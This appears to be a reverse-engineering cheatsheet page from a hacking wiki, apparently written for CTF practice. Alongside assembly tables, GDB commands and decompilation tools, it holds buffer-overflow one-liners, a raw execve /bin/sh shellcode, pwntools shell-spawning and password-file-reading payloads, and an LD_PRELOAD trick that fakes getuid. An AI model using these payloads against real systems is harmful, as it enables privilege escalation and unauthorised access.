🥷
Hacksheet
  • README
  • scripts
  • wiki
    • BlockChain
    • Cloud
    • Crypto
    • Database
    • Extensions
    • Index
    • Javascript
    • Linux
    • Network
    • OSINT
    • Others
    • Port
    • Python
    • ReverseEngineering
    • Stego
    • Web
    • Windows
Powered by GitBook
On this page
  • ASM
  • Operation
  • Overflow
  • Shellcode
  • GDB
  • Peda
  • Binary ninja
  • Lib Injection
  • Decompile Python Executable
  • Macro Office PPTM
  1. wiki

ReverseEngineering

PreviousPythonNextStego

Last updated 2 years ago

  • ASM

  • Binary ninja

  • Decompile Python Executable

  • GDB

  • Lib Injection

  • Macro Office PPTM

  • OverFlow

  • Shellcode

ASM

Variables

x64
x32
What is ?

RAX

EAX

Return Value

RCX

ECX

Counter (or Fourth Arg)

RDX

EDX

Third Arg

RSI

ESI

Second Arg

RDI

EDI

First Arg of Function

RSP

ESP

Stack Pointer

RIP

EIP

Next Instruction

R8-R11

r8d-r11d

Scratch register

R12-R15

r12d-r15d

Preserved register

Source

Operation

Operation
Explication

MOV size dest,src

dest ← src

LEA dest,[op]

dest ← addr op

PUSH op

Increase RSP & Store op

POP op

Load op & Discrease RSP

ADD op1,op2

op1 ← op1 + op2

SUB op1,op2

op1 ← op1 - op2

NEG reg

reg ← -reg

INC reg

reg ← reg + 1

DEC reg

reg ← reg - 1

AND op1,op2

op1 ← op1 & op2

OR op1,op2

op1 ← op1

XOR op1,op2

op1 ← op1 ^ op2

CMP op1,op2

op1 - op2

TEST op1,op2

op1 & op2

JMP op

Jump to op

Source - Page 21

Overflow

Basic

(python -c "import struct; print('A' * (100 - 0) + struct.pack('<I', 0xffffffff))")

Shellcode

(python -c "import struct; print('\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80' + 'A' * (100 - 21) + struct.pack('<I', 0xffffffff))")

Shellcode

Cat

python -c "import pwn; shell = pwn.asm(pwn.shellcraft.i386.linux.cat('/home/users/level05/.pass')); print(shell); print(len(shell))"

Exec sh 1

python -c "import pwn; shell = pwn.asm(pwn.shellcraft.i386.linux.sh()); print(shell); print(len(shell))"

Exec sh 2

\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80
21

GDB

Command

b *0x12345678      # Breakpoint
b strcpy           # Breakpoint
r                  # Run program
r < <(echo lol)    # Run with pipe
r arg1 arg2        # Run with arg
c                  # Continue
n                  # Next operation
set $eax=0x00      # Set variable
info register      # Show Register

Print

x/s "string"
x/d 53
x/x 0xff
help x

print $rax

  • Gdb cheatsheet - gabriellesc

  • Gdb cheatsheet - darkdust

Get env address

x/10s **(char***)&environ

Peda

Install

git clone https://github.com/longld/peda.git ~/.peda
echo "source ~/.peda/peda.py" >> ~/.gdbinit
echo "DONE! debug your program with gdb and enjoy"

Binary ninja

Scrap code from html

let result = '';
[...document.querySelectorAll('.LinearDisassemblyLine')].forEach(parent_elmt => {
  [...parent_elmt.children].forEach(children_elmt => {
    result += children_elmt.textContent
  });
  result +=  '\n'
});
console.log(result);

Lib Injection

  • Recreate getuid function

uid_t	getuid(void)
{
	return (4242);
}

  • compile

gcc -shared -fpic lib.c -o libnike.so -m32

  • run and inject

LD_PRELOAD=./libnike.so ./exec

Decompile Python Executable

Convert executable into .pyc

git clone https://github.com/extremecoders-re/pyinstxtractor
cd pyinstxtractor
python3 pyinstxtractor.py exec

Disassembly .pyc (compatible python 3.9.2)

git clone https://github.com/zrax/pycdc
cd pycdc
cmake
make
./pycdc file.pyc # Convert .pyc into .py
./pycdas file.pyc # Convert .pyc into byte-code disassembly

Macro Office PPTM

Install

sudo pip3 install oletools

Decompress PPTM

olevba  -c file.pptm

  • ViperMonkey